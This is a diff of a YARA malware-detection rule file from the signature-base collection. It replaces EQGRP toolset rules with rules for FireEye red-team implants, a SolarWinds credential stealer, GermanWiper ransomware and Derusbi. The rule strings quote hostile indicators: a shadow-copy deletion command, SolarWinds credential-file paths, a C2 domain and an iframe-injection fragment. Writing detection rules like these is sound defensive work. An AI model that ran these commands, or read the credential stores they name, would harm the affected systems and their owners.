+		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_fireeye_redteam_tools.yar#L1376-L1391"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3a2ee46c6fec1b7a501e8c0e2963d4873ede89d192d0f4701d051f782e8ece99"
+		hash = "4410e95de247d7f1ab649aa640ee86fb"
+		logic_hash = "0f28fb23c0c1d589466c7c541c8dc588b038d02dded0c66c4a448d1f768c95c5"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "de52f5621b4f3896d4bd1fb93ee8be827e71a2b189a9f8552b68baed062a992d"
+		tags = ""
 
 	strings:
-		$x1 = "required by SECONDDATE" fullword ascii
-		$s1 = "help='Output file name (optional). By default the resulting data is written to stdout.')" fullword ascii
-		$s2 = "data = '<html><body onload=\"location.reload(true)\"><iframe src=\"%s\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"" ascii
-		$s3 = "version='%prog 1.0'," fullword ascii
-		$s4 = "usage='%prog [ ... options ... ] url'," fullword ascii
+		$s1 = "<510sxxII"
+		$s2 = "0x43,0x00,0x3a,0x00,0x5c,0x00,0x57,0x00,0x69,0x00,0x6e,0x00,0x64,0x00,0x6f,0x00,"
+		$s3 = "parsePluginOutput"
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 3KB and ( $x1 or 2 of them ) ) or ( all of them )
+		all of them and #s2 == 2
 }
-rule SIGNATURE_BASE_EQGRP_BFLEA_2201 : FILE
+rule SIGNATURE_BASE_APT_Backdoor_Win_GORAT_2_1 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BFLEA-2201.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7dfdc2a2-73d1-5eba-8936-ed14b17495c5"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L804-L823"
+		description = "Verifies that the sample is a Windows PE that is less than 10MB in size and has the Go build ID strings. Then checks for various strings known to be in the Gorat implant including strings used in C2 json, names of methods, and the unique string 'murica' used in C2 comms. A check is done to ensure the string 'rat' appears in the binary over 1000 times as it is the name of the project used by the implant and is present well over 2000 times."
+		author = "FireEye"
+		id = "e2c47711-d088-5cb4-8d21-f8199a865a28"
+		date = "2020-12-08"
+		modified = "2025-02-12"
+		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_fireeye_redteam_tools.yar#L1453-L1484"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d0fd4d0ffe98856abed685c4b9ff770daba22aa16bd860440874fd94df2d54ea"
+		hash = "f59095f0ab15f26a1ead7eed8cdb4902"
+		logic_hash = "45c83e0d39184abcbc0ccc5804ab745b4feec1fad424a543a05754e5b4cca311"
 		score = 75
-		quality = 83
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "15e8c743770e44314496c5f27b6297c5d7a4af09404c4aa507757e0cc8edc79e"
 
 	strings:
-		$s1 = ".got_loader" fullword ascii
-		$s2 = "LOADED" fullword ascii
-		$s3 = "readFlashHandler" fullword ascii
-		$s4 = "KEEPGOING" fullword ascii
-		$s5 = "flashRtnsPix6x.c" fullword ascii
-		$s6 = "fix_ip_cksum_incr" fullword ascii
-		$s7 = "writeFlashHandler" fullword ascii
+		$go1 = "go.buildid" ascii wide
+		$go2 = "Go build" ascii wide
+		$json1 = "json:\"pid\"" ascii wide
+		$json2 = "json:\"key\"" ascii wide
+		$json3 = "json:\"agent_time\"" ascii wide
+		$json4 = "json:\"rid\"" ascii wide
+		$json5 = "json:\"ports\"" ascii wide
+		$json6 = "json:\"agent_platform\"" ascii wide
+		$rat = "rat" ascii wide
+		$str1 = "handleCommand" ascii wide
+		$str2 = "sendBeacon" ascii wide
+		$str3 = "rat.AgentVersion" ascii wide
+		$str4 = "rat.Core" ascii wide
+		$str5 = "rat/log" ascii wide
+		$str6 = "rat/comms" ascii wide
+		$str7 = "rat/modules" ascii wide
+		$str8 = "murica" ascii wide
+		$str9 = "master secret" ascii wide
+		$str10 = "TaskID" ascii wide
+		$str11 = "rat.New" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 30KB and 5 of them ) or ( all of them )
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and all of ( $go* ) and all of ( $json* ) and all of ( $str* ) and #rat > 1000
 }
-rule SIGNATURE_BASE_EQGRP_Bpfcreator_RHEL4 : FILE
+
+rule SIGNATURE_BASE_APT_Backdoor_Win_GORAT_4_1 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BpfCreator-RHEL4"
-		author = "Florian Roth (Nextron Systems)"
-		id = "476185f2-b093-5fb9-8604-891e96fe52a9"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L825-L842"
+		description = "Verifies that the sample is a Windows PE that is less than 10MB in size and exports numerous functions that are known to be exported by the Gorat implant. This is done in an effort to provide detection for packed samples that may not have other strings but will need to replicate exports to maintain functionality."
+		author = "FireEye"
+		id = "ae67445c-e7fd-5858-be8b-7ee84a16a031"
+		date = "2020-12-08"
+		modified = "2025-02-12"
+		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_fireeye_redteam_tools.yar#L1706-L1716"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8586425b13355170137d66fe8d52ed98982d7c5699b26a8c0132f107b4af43d8"
+		hash = "f59095f0ab15f26a1ead7eed8cdb4902"
+		logic_hash = "fa76e994beb2ab1b7950cf9d6391adf4e1ba45586a14a6340fa8a25a904821e4"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "bd7303393409623cabf0fcf2127a0b81fae52fe40a0d2b8db0f9f092902bbd92"
-
-	strings:
-		$s1 = "usage %s \"<tcpdump pcap string>\" <outfile>" fullword ascii
-		$s2 = "error reading dump file: %s" fullword ascii
-		$s3 = "truncated dump file; tried to read %u captured bytes, only got %lu" fullword ascii
-		$s4 = "%s: link-layer type %d isn't supported in savefiles" fullword ascii
-		$s5 = "DLT %d is not one of the DLTs supported by this device" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 2000KB and all of them )
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and pe.exports ( "MemoryCallEntryPoint" ) and pe.exports ( "MemoryDefaultAlloc" ) and pe.exports ( "MemoryDefaultFree" ) and pe.exports ( "MemoryDefaultFreeLibrary" ) and pe.exports ( "MemoryDefaultGetProcAddress" ) and pe.exports ( "MemoryDefaultLoadLibrary" ) and pe.exports ( "MemoryFindResource" ) and pe.exports ( "MemoryFindResourceEx" ) and pe.exports ( "MemoryFreeLibrary" ) and pe.exports ( "MemoryGetProcAddress" ) and pe.exports ( "MemoryLoadLibrary" ) and pe.exports ( "MemoryLoadLibraryEx" ) and pe.exports ( "MemoryLoadResource" ) and pe.exports ( "MemoryLoadString" ) and pe.exports ( "MemoryLoadStringEx" ) and pe.exports ( "MemorySizeofResource" ) and pe.exports ( "callback" ) and pe.exports ( "crosscall2" ) and pe.exports ( "crosscall_386" )
 }
-rule SIGNATURE_BASE_EQGRP_Storefc
+rule SIGNATURE_BASE_Hacktool_MSIL_PXELOOT_2_1 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file StoreFc.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "48bbf5c9-e884-5126-93a2-d27650409882"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L844-L859"
+		description = "This rule looks for .NET PE files that have the strings of various method names in the PXE And Loot code."
+		author = "FireEye"
+		id = "ff46a0e9-f7d2-57f2-9727-26b69ea5ba71"
+		date = "2020-12-08"
+		modified = "2023-01-27"
+		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_fireeye_redteam_tools.yar#L2088-L2113"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f07c3ef83808852f70fb5cbc4436d531675344ab74f83888cd70d987c3544cce"
+		hash = "d93100fe60c342e9e3b13150fd91c7d8"
+		logic_hash = "f9a9167b806e0e3df3720c13b4009e18c5a36913d255978cb001c2284533ea82"
 		score = 75
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f155cce4eecff8598243a721389046ae2b6ca8ba6cb7b4ac00fd724601a56108"
+		quality = 43
+		tags = "FILE"
 
 	strings:
-		$x1 = "Usage: StoreFc.py --configFile=<path to xml file> --implantFile=<path to BinStore implant> [--outputFile=<file to write the conf" ascii
-		$x2 = "raise Exception, \"Must supply both a config file and implant file.\"" fullword ascii
-		$x3 = "This is wrapper for Store.py that FELONYCROWBAR will use. This" fullword ascii
+		$msil = "_CorExeMain" ascii wide
+		$str2 = "InvestigateRPC" ascii nocase wide
+		$str3 = "DhcpRecon" ascii nocase wide
+		$str4 = "UnMountWim" ascii nocase wide
+		$str5 = "remote WIM image" ascii nocase wide
+		$str6 = "DISMWrapper" ascii nocase wide
+		$str7 = "findTFTPServer" ascii nocase wide
+		$str8 = "DHCPRequestRecon" ascii nocase wide
+		$str9 = "DHCPDiscoverRecon" ascii nocase wide
+		$str10 = "GoodieFile" ascii nocase wide
+		$str11 = "InfoStore" ascii nocase wide
+		$str12 = "execute" ascii nocase wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and all of ( $str* )
 }
-rule SIGNATURE_BASE_EQGRP_Hexdump : FILE
+rule SIGNATURE_BASE_HKTL_Solarwinds_Credential_Stealer : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file hexdump.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "32a7d845-2fa3-5d8f-84e1-2c7f8d2ca8c8"
-		date = "2016-08-16"
+		description = "Detects solarwinds credential stealers like e.g. solarflare via the touched certificate, files and database columns"
+		author = "Arnim Rupp"
+		id = "87dba889-367a-5fc3-b5e0-eb8e3c36a5e9"
+		date = "2021-01-20"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L861-L877"
+		reference = "https://github.com/mubix/solarflare"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_solarwinds_credential_stealer.yar#L2-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ed36aa5a69296088bdd1db42e6561377294b7bd99c30104b9d4a618d899d7e9a"
+		hash = "1b2e5186464ed0bdd38fcd9f4ab294a7ba28bd829bf296584cbc32e2889037e4"
+		hash = "4adb69d4222c80d97f8d64e4d48b574908a518f8d504f24ce93a18b90bd506dc"
+		logic_hash = "ccf55ba7b66ff8d0f926999f3d68dc3b2fdc1c9ce15e1f08b75d003c62393312"
 		score = 75
-		quality = 85
+		quality = 51
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "95a9a6a8de60d3215c1c9f82d2d8b2640b42f5cabdc8b50bd1f4be2ea9d7575a"
 
 	strings:
-		$s1 = "def hexdump(x,lead=\"[+] \",out=sys.stdout):" fullword ascii
-		$s2 = "print >>out, \"%s%04x  \" % (lead,i)," fullword ascii
-		$s3 = "print >>out, \"%02X\" % ord(x[i+j])," fullword ascii
-		$s4 = "print >>out, sane(x[i:i+16])" fullword ascii
+		$certificate = "CN=SolarWinds-Orion" ascii nocase wide
+		$credfile1 = "\\CredentialStorage\\SolarWindsDatabaseAccessCredential" ascii nocase wide
+		$credfile2 = "\\KeyStorage\\CryptoHelper\\default.dat" ascii nocase wide
+		$credfile3 = "\\Orion\\SWNetPerfMon.DB" ascii nocase wide
+		$credfile4 = "\\Orion\\RabbitMQ\\.erlang.cookie" ascii nocase wide
+		$sql1 = "encryptedkey" ascii nocase wide fullword
+		$sql2 = "protectiontype" ascii nocase wide fullword
+		$sql3 = "CredentialProperty" ascii nocase wide fullword
+		$sql4 = "passwordhash" ascii nocase wide fullword
+		$sql5 = "credentialtype" ascii nocase wide fullword
+		$sql6 = "passwordsalt" ascii nocase wide fullword
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 1KB and 2 of ( $s* ) ) or ( all of them )
+		uint16( 0 ) == 0x5A4D and $certificate and ( 2 of ( $credfile* ) or 5 of ( $sql* ) )
 }
-rule SIGNATURE_BASE_EQGRP_BBALL : FILE
+rule SIGNATURE_BASE_MAL_Ransomware_Germanwiper : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BBALL_E28F6-2201.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bced11a2-fac4-58e5-a4a8-1c6d5fe418f9"
-		date = "2016-08-16"
+		description = "Detects RansomWare GermanWiper in Memory or in unpacked state"
+		author = "Frank Boldewin (@r3c0nst), modified by Florian Roth"
+		id = "e7587691-f69a-53e7-bab2-875179fbfa19"
+		date = "2019-08-05"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L879-L898"
+		reference = "https://twitter.com/r3c0nst/status/1158326526766657538"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_germanwiper.yar#L1-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b02d17a13725b5215c89590abf77f960e79f9fd155c9ea4e9eb903710a7a375e"
+		logic_hash = "dcb4f91006a893149a60e9708efb9de809f75c810bddfd2d90c8f6fffa0879ea"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "498fc9f20b938b8111adfa3ca215325f265a08092eefd5300c4168876deb7bf6"
+		hash_packed = "41364427dee49bf544dcff61a6899b3b7e59852435e4107931e294079a42de7c"
+		hash_unpacked = "708967cad421bb2396017bdd10a42e6799da27e29264f4b5fb095c0e3503e447"
 
 	strings:
-		$s1 = "Components/Modules/BiosModule/Implant/E28F6/../e28f640j3_asm.S" fullword ascii
-		$s2 = ".got_loader" fullword ascii
-		$s3 = "handler_readBIOS" fullword ascii
-		$s4 = "cmosReadByte" fullword ascii
-		$s5 = "KEEPGOING" fullword ascii
-		$s6 = "checksumAreaConfirmed.0" fullword ascii
-		$s7 = "writeSpeedPlow.c" fullword ascii
+		$x_Mutex1 = "HSDFSD-HFSD-3241-91E7-ASDGSDGHH" ascii
+		$x_Mutex2 = "cFgxTERNWEVhM2V" ascii
+		$PurgeCode = { 6a 00 8b 47 08 50 6a 00 6a 01 e8 ?? ?? ?? ??
+                     50 e8 ?? ?? ?? ?? 8b f0 8b d7 8b c3 e8 }
+		$ProcessKill1 = "sqbcoreservice.exe" ascii
+		$ProcessKill2 = "isqlplussvc.exe" ascii
+		$KillShadowCopies = "vssadmin.exe delete shadows" ascii
+		$Domain1 = "cdnjs.cloudflare.com" ascii
+		$Domain2 = "expandingdelegation.top" ascii
+		$RansomNote = "Entschluesselungs_Anleitung.html" ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 40KB and 4 of ( $s* ) ) or ( all of them )
+		uint16( 0 ) == 0x5A4D and filesize < 1000KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_EQGRP_BARPUNCH_BPICKER : FILE
+rule SIGNATURE_BASE_Derusbi_Kernel : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - from files BARPUNCH-3110, BPICKER-3100"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7e88ba9d-1f15-533a-b388-a2a027ddb07c"
-		date = "2016-08-16"
+		description = "Derusbi Driver version"
+		author = "Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud"
+		id = "a60ab93a-e2be-53ee-a7da-56c763bc5533"
+		date = "2015-12-09"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L902-L921"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_derusbi.yar#L9-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f5d0cc881bedad736a90109933da8dbd32c4435aa255676c68ae3541bbb61e74"
+		logic_hash = "d5a0ce0b0116c3a84d52c22369dbf3cb9cf3ad8f8a05cea5565ba9bb99255fab"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
-		hash2 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
 
 	strings:
-		$x1 = "--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s --lptimeout %u" fullword ascii
-		$x2 = "%s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options]" fullword ascii
-		$x3 = "* [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration)" fullword ascii
-		$x4 = "%s version %s already has persistence installed. If you want to uninstall," fullword ascii
-		$x5 = "The active module(s) on the target are not meant to be persisted" fullword ascii
+		$token1 = "$$$--Hello"
+		$token2 = "Wrod--$$$"
+		$class = ".?AVPCC_BASEMOD@@"
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 6000KB and 1 of them ) or ( 3 of them )
+		uint16( 0 ) == 0x5A4D and $token1 and $token2 and $class
 }
-rule SIGNATURE_BASE_EQGRP_Implants_Gen6 : FILE
+rule SIGNATURE_BASE_Derusbi_Linux : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1b1c6426-7274-5fd4-9ea2-ef10bda769d4"
-		date = "2016-08-16"
+		description = "Derusbi Server Linux version"
+		author = "Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud"
+		id = "2b33afb5-be87-5d41-b05e-b99d0c1d8ed9"
+		date = "2015-12-09"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L923-L951"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_derusbi.yar#L24-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9f0aa1994199c8cef543b7602b574726171dd96df159a0c496db0c60c339c4d0"
+		logic_hash = "68d5af17b33d1aa0388516e5d2a1ad29c22dc04451e232dfbdf1ef0714baeb10"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
-		hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
-		hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
-		hash4 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
-		hash5 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
-		hash6 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
-		hash7 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
 
 	strings:
-		$s1 = "LP.c:pixSecurity - Improper number of bytes read in Security/Interface Information" fullword ascii
-		$s2 = "LP.c:pixSecurity - Not in Session" fullword ascii
-		$s3 = "getModInterface__preloadedModules" fullword ascii
-		$s4 = "showCommands" fullword ascii
-		$s5 = "readModuleInterface" fullword ascii
-		$s6 = "Wrapping_Not_Necessary_Or_Wrapping_Ok" fullword ascii
-		$s7 = "Get_CMD_List" fullword ascii
-		$s8 = "LP_Listen2" fullword ascii
-		$s9 = "killCmdList" fullword ascii
+		$PS1 = "PS1=RK# \\u@\\h:\\w \\$"
+		$cmd = "unset LS_OPTIONS;uname -a"
+		$pname = "[diskio]"
+		$rkfile = "/tmp/.secure"
+		$ELF = "\x7fELF"
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 6000KB and all of them )
+		$ELF at 0 and $PS1 and $cmd and $pname and $rkfile
 }
-rule SIGNATURE_BASE_EQGRP_Implants_Gen5 : FILE
+rule SIGNATURE_BASE_Derusbi_Kernel_Driver_WD_UDFS : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall"
+		description = "Detects Derusbi Kernel Driver"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e35748ee-d530-5e73-a74d-5675d05725e9"
-		date = "2016-08-16"
+		id = "51d80d19-f87f-5b09-ac49-08ebcb464013"
+		date = "2015-12-15"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L953-L978"
+		reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_derusbi.yar#L48-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d4bbd9dbde4ca1da80d49157363ade3ec47d55828529ec7e1a46b64d07c991f0"
-		score = 75
+		logic_hash = "bea8dafbef01ca8cf747a1f24804c0fb7868db09ce8091ff93c9c5d67d95ca3e"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
-		hash2 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
-		hash3 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
-		hash4 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
-		hash5 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
-		hash6 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
-		hash7 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
-		hash8 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
+		hash1 = "1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016"
+		hash2 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a"
+		hash3 = "6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58"
+		hash4 = "e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59"
 
 	strings:
-		$x1 = "Module and Implant versions do not match.  This module is not compatible with the target implant" fullword ascii
-		$s1 = "%s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.log" fullword ascii
-		$s2 = "%s/BF_%04d%02d%02d.log" fullword ascii
-		$s3 = "%s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.bin" fullword ascii
+		$x1 = "\\\\.\\pipe\\usbpcex%d" fullword wide
+		$x2 = "\\\\.\\pipe\\usbpcg%d" fullword wide
+		$x3 = "\\??\\pipe\\usbpcex%d" fullword wide
+		$x4 = "\\??\\pipe\\usbpcg%d" fullword wide
+		$x5 = "$$$--Hello" fullword ascii
+		$x6 = "Wrod--$$$" fullword ascii
+		$s1 = "\\Registry\\User\\%s\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" wide
+		$s2 = "Update.dll" fullword ascii
+		$s3 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WMI" wide
+		$s4 = "\\Driver\\nsiproxy" wide
+		$s5 = "HOST: %s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and 1 of ( $x* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( 2 of ( $x* ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_EQGRP_Pandarock : FILE
+rule SIGNATURE_BASE_Derusbi_Code_Signing_Cert : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - from files pandarock_v1.11.1.1.bin, pit"
+		description = "Detects an executable signed with a certificate also used for Derusbi Trojan - suspicious"
 		author = "Florian Roth (Nextron Systems)"
-		id = "aa0ee05b-b3e4-576a-8a32-bdc8d98fe636"
-		date = "2016-08-16"
+		id = "d123fde9-0182-5232-a716-b76e8d9830c4"
+		date = "2015-12-15"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L980-L1007"
+		reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_derusbi.yar#L81-L96"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d0a61410d7c5f309489ef4553f41a3a6fb7d0f24bcdb1f0d88e896265513add2"
-		score = 75
+		logic_hash = "dae976a4896a4f6b6a1b415582db84f3da5aac03bf4079f75e11c790dcf23900"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "1214e282ac7258e616ebd76f912d4b2455d1b415b7216823caa3fc0d09045a5f"
-		hash2 = "c8a151df7605cb48feb8be2ab43ec965b561d2b6e2a837d645fdf6a6191ab5fe"
 
 	strings:
-		$x1 = "* Not attempting to execute \"%s\" command" fullword ascii
-		$x2 = "TERMINATING SCRIPT (command error or \"quit\" encountered)" fullword ascii
-		$x3 = "execute code in <file> passing <argX> (HEX)" fullword ascii
-		$x4 = "* Use arrow keys to scroll through command history" fullword ascii
-		$s1 = "pitCmd_processCmdLine" fullword ascii
-		$s2 = "execute all commands in <file>" fullword ascii
-		$s3 = "__processShellCmd" ascii
-		$s4 = "pitTarget_getDstPort" fullword ascii
-		$s5 = "__processSetTargetIp" ascii
-		$o1 = "Logging commands and output - ON" fullword ascii
-		$o2 = "This command is too dangerous.  If you'd like to run it, contact the development team" fullword ascii
+		$s1 = "Fuqing Dawu Technology Co.,Ltd.0" fullword ascii
+		$s2 = "XL Games Co.,Ltd.0" fullword ascii
+		$s3 = "Wemade Entertainment co.,Ltd0" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 3000KB and 1 of ( $x* ) ) or ( 4 of them ) or 1 of ( $o* )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and 1 of them
 }
-rule SIGNATURE_BASE_EQGRP_Bananausurper_Writejetplow : FILE
+rule SIGNATURE_BASE_XOR_4Byte_Key : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, writeJetPlow-2130"
+		description = "Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan)"
 		author = "Florian Roth (Nextron Systems)"
